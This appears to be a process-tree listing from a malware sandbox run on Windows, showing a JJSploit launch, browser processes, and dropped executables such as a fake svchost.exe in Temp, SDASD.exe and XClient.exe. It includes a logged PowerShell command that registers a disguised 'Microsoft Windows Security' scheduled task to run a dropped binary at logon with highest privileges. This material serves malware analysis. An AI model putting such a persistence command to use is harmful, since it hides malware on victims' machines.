C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6840 -childID 7 -isForBrowser -prefsHandle 6792 -prefMapHandle 6804 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa90dca1-0bb2-43c5-8403-a6cc30bb414b} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:9040
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7060 -childID 8 -isForBrowser -prefsHandle 6980 -prefMapHandle 6984 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f8a5767-bb69-487c-afce-6cdba3397f01} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:9064
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:8972
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:8772
-
-
C:\Users\Admin\AppData\Local\JJSploit\JJSploit.exeC:\Users\Admin\AppData\Local\JJSploit\JJSploit.exe2⤵PID:2596
-
C:\Windows\system32\cmd.exe"cmd" /C start https://www.youtube.com/@Omnidev_3⤵PID:6460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@Omnidev_4⤵PID:1132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa7d7b3cb8,0x7ffa7d7b3cc8,0x7ffa7d7b3cd85⤵PID:7644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,11043531513644243091,14554094733063341322,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:25⤵PID:4808
-
-
-
-
C:\Windows\system32\cmd.exe"cmd" /C start https://www.youtube.com/@WeAreDevsExploits3⤵PID:8288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/@WeAreDevsExploits4⤵PID:2472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffa7d7b3cb8,0x7ffa7d7b3cc8,0x7ffa7d7b3cd85⤵PID:7292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,12069592164556563193,12635475063929670351,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2028 /prefetch:25⤵PID:8680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,12069592164556563193,12635475063929670351,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:35⤵PID:7512
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.7 --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --disable-features=msWebOOUI,msPdfOOUI,msSmartScreenProtection --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --lang=uk-UA --mojo-named-platform-channel-pipe=2596.8524.149098139118165736063⤵PID:8528
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x1b4,0x7ffa7d7b3cb8,0x7ffa7d7b3cc8,0x7ffa7d7b3cd84⤵PID:8668
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1704,3750517261117588025,4914711649788543871,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.7 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1812 /prefetch:24⤵PID:9068
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,3750517261117588025,4914711649788543871,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=uk --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.7 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --mojo-platform-channel-handle=1908 /prefetch:34⤵PID:500
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1704,3750517261117588025,4914711649788543871,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=uk --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.7 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --mojo-platform-channel-handle=1744 /prefetch:84⤵PID:7668
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1704,3750517261117588025,4914711649788543871,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=uk --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.7 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:14⤵PID:8140
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:9552
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:7564
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵PID:6260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 45921⤵PID:696
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5228
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5460
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exeC:\Users\Admin\AppData\Local\Temp\SDASD.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:5228
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
PID:5856
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exeC:\Users\Admin\AppData\Local\Temp\SDASD.exe1⤵
- Executes dropped EXE
PID:5412
-
C:\Windows\System32\DataExchangeHost.exeC:\Windows\System32\DataExchangeHost.exe -Embedding1⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
PID:2748
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exeC:\Users\Admin\AppData\Local\Temp\SDASD.exe1⤵
- Executes dropped EXE
PID:4940
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6380 -
C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\131.0.6778.86_chrome_installer.exe"C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\gui8890.tmp"2⤵PID:4668
-
C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\gui8890.tmp"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:2980 -
C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7425c5d68,0x7ff7425c5d74,0x7ff7425c5d804⤵
- Drops file in Windows directory
PID:1328
-
-
C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=14⤵
- Drops file in Windows directory
PID:4292 -
C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe"C:\Program Files (x86)\Google\Update\Install\{9B1BB309-226D-4566-95A3-69EABAAB3800}\CR_477F4.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7425c5d68,0x7ff7425c5d74,0x7ff7425c5d805⤵
- Drops file in Windows directory
PID:2804
-
-
-
-
-
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"2⤵PID:3032
-
-
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"2⤵PID:8076
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUNGM0Y3MDItNDQ3Mi00QkRFLThFOEItRDk3QkZFOTZCMzJEfSIgdXNlcmlkPSJ7ODgzOTVERTQtOEYzNi00RTE3LTk1MTQtRkRFNTE4MEY5NTg1fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0MxMTc2MDMxLUI4MzUtNDZEQy1CRDZCLUNEMkQzNEU3OEY3Rn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M0MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMzEuMC42Nzc4Ljg2IiBhcD0ieDY0LXN0YWJsZS1zdGF0c2RlZl8xIiBsYW5nPSJ6aC1DTiIgYnJhbmQ9IiIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjUxIiBpaWQ9IntEQjI0RUREMy05OTIwLTVENUYtRkJCRS04RTc0M0Y3NDg2QzF9IiBjb2hvcnQ9IjE6Z3UvaTE5OiIgY29ob3J0bmFtZT0iU3RhYmxlIEluc3RhbGxzICZhbXA7IFZlcnNpb24gUGlucyI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9hZG1neGx0NGQ1YzVyY3Rub3p3M3d6cGh3MndxXzEzMS4wLjY3NzguODYvMTMxLjAuNjc3OC44Nl9jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iMTE2MTE5NDA4IiB0b3RhbD0iMTE2MTE5NDA4IiBkb3dubG9hZF90aW1lX21zPSIzNDU5MyIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMTYzNSIgZG93bmxvYWRfdGltZV9tcz0iMzYwMTUiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSIzNzQ5MCIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8308
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵
- Executes dropped EXE
PID:6860
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exeC:\Users\Admin\AppData\Local\Temp\SDASD.exe1⤵PID:6868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6760 -ip 67601⤵PID:6276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6264 -ip 62641⤵PID:6780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6132 -ip 61321⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6748 -ip 67481⤵PID:2020
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004E81⤵PID:3952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3468 -ip 34681⤵PID:4060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4580 -ip 45801⤵PID:5952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5016 -ip 50161⤵PID:7756
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe1⤵PID:8132
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exeC:\Users\Admin\AppData\Local\Temp\SDASD.exe1⤵PID:7208
-
C:\Users\Admin\Desktop\Files\AA_v3.exe"C:\Users\Admin\Desktop\Files\AA_v3.exe" -service -lunch1⤵PID:7668
-
C:\Users\Admin\Desktop\Files\AA_v3.exe"C:\Users\Admin\Desktop\Files\AA_v3.exe"2⤵PID:7520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7868 -ip 78681⤵PID:1444
-
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding1⤵PID:8196
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand2⤵PID:8376
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer3⤵PID:8900
-
